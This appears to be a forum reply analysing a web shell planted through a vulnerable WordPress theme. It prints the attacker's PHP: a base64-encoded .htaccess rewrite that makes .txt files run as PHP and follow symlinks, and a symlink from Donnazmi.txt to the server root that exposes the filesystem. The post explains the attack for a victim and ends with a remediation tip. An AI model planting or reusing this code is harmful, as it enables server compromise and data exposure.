Once the file is uploaded to the server (exploiting a bug in a wordpress theme), the
.htaccess is reconfigured in a way that any
.txt file will be interpreted by the server as a
.php script and it will follow symlinks.
The next step is the trick, he makes a symlink from
Donnazmi.txt (2 ways)
The code isn’t really complex, it prints an html form with the needed configs to run the exploit steps (you need to send a post request with
Donnazmi as a post key to see it).
$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
This is a base64 encoded string, which translates into:
Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php
So with that config:
$file = fopen(".htaccess","w+"); // open the file $write = fwrite ($file ,base64_decode($fvckem)); // write the new config inside the file
// 1. this is a link with the linux comand `ln` system('ln -s / Donnazmi.txt'); // 2. this is a link php native function $Donnazmi = symlink("/","Donnazmi.txt");
After the execution, each time he visits example.com/Donnazmi.txt he sees a list of the root directory of your server (
Options Indexes tm).
So yes rebuild that machine. and check the software before installing it.
The video that I found was the first thing to come up when I googled the hacker’s name.
Do you have WordPress Cold Fusion theme installed by any chance?
Here is the so called Mauritania Attacker’s video on explaining how he exploits the specific WordPress theme to upload files on server.